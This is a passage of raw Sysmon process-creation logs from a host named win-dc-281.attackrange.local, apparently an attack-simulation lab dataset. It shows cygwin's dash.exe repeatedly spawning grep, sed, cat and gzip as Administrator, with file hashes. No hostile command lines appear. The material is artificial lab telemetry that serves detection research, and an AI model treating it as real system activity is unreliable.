14:55:54.153{A8622C2F-53FA-6078-2608-00000000AE01}6032C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-2308-00000000AE01}1392C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046010Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.153{A8622C2F-53FA-6078-2508-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045991Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.145{A8622C2F-53FA-6078-2408-00000000AE01}4476C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-2208-00000000AE01}5144C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045990Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.145{A8622C2F-53FA-6078-2308-00000000AE01}1392C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045979Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.138{A8622C2F-53FA-6078-2208-00000000AE01}5144C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045970Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.129{A8622C2F-53FA-6078-2108-00000000AE01}6196C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-2008-00000000AE01}6852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045956Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.122{A8622C2F-53FA-6078-2008-00000000AE01}6852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045940Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.112{A8622C2F-53FA-6078-1F08-00000000AE01}4412C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-1E08-00000000AE01}6076C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045925Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.104{A8622C2F-53FA-6078-1E08-00000000AE01}6076C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045924Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.104{A8622C2F-53FA-6078-1D08-00000000AE01}5804C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-1B08-00000000AE01}5864C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.097{A8622C2F-53FA-6078-1C08-00000000AE01}6240C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-1A08-00000000AE01}6416C:\cygwin64\bin\dash.exe- 154100x800000000000000045906Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.097{A8622C2F-53FA-6078-1B08-00000000AE01}5864C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.089{A8622C2F-53FA-6078-1A08-00000000AE01}6416C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045883Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.081{A8622C2F-53FA-6078-1908-00000000AE01}1628C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-1808-00000000AE01}2408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045869Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.074{A8622C2F-53FA-6078-1808-00000000AE01}2408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.065{A8622C2F-53FA-6078-1708-00000000AE01}3300C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-1508-00000000AE01}3200C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.057{A8622C2F-53FA-6078-1608-00000000AE01}1140C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-1308-00000000AE01}5052C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045837Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.057{A8622C2F-53FA-6078-1508-00000000AE01}3200C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045823Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.049{A8622C2F-53FA-6078-1408-00000000AE01}4832C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-1208-00000000AE01}6440C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045821Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.049{A8622C2F-53FA-6078-1308-00000000AE01}5052C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.042{A8622C2F-53FA-6078-1208-00000000AE01}6440C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045797Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.034{A8622C2F-53FA-6078-1108-00000000AE01}3304C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-1008-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045783Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.027{A8622C2F-53FA-6078-1008-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.016{A8622C2F-53FA-6078-0F08-00000000AE01}4568C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-0D08-00000000AE01}6592C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045754Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.009{A8622C2F-53FA-6078-0E08-00000000AE01}5516C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-0B08-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045751Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.009{A8622C2F-53FA-6078-0D08-00000000AE01}6592C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.001{A8622C2F-53FA-6078-0C08-00000000AE01}6968C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-0A08-00000000AE01}1476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045735Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.001{A8622C2F-53FA-6078-0B08-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045723Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.994{A8622C2F-53F9-6078-0A08-00000000AE01}1476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045710Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.985{A8622C2F-53F9-6078-0908-00000000AE01}5804C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-0808-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.978{A8622C2F-53F9-6078-0808-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045688Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.969{A8622C2F-53F9-6078-0708-00000000AE01}6040C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-0508-00000000AE01}2084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045670Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.960{A8622C2F-53F9-6078-0608-00000000AE01}2508C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-0308-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045668Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.960{A8622C2F-53F9-6078-0508-00000000AE01}2084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045651Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.953{A8622C2F-53F9-6078-0408-00000000AE01}5084C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-0208-00000000AE01}5664C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.953{A8622C2F-53F9-6078-0308-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045636Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.945{A8622C2F-53F9-6078-0208-00000000AE01}5664C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045624Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.937{A8622C2F-53F9-6078-0108-00000000AE01}5404C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-0008-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045614Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.929{A8622C2F-53F9-6078-0008-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045602Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.920{A8622C2F-53F9-6078-FF07-00000000AE01}6332C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-FD07-00000000AE01}5628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.912{A8622C2F-53F9-6078-FE07-00000000AE01}5776C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-FB07-00000000AE01}3176C:\cygwin64\bin\dash.exe- 154100x800000000000000045581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.912{A8622C2F-53F9-6078-FD07-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045566Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 